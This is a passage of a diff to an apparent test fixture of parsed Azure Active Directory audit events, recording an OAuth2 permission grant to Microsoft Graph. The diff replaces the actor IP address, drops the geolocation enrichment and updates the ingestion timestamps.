Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125361200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -18917,25 +17279,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18949,7 +17293,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19085,7 +17429,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -19097,12 +17441,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036572300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125367600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19128,25 +17472,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19160,7 +17486,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19296,7 +17622,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -19308,12 +17634,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036576200Z", - "original": 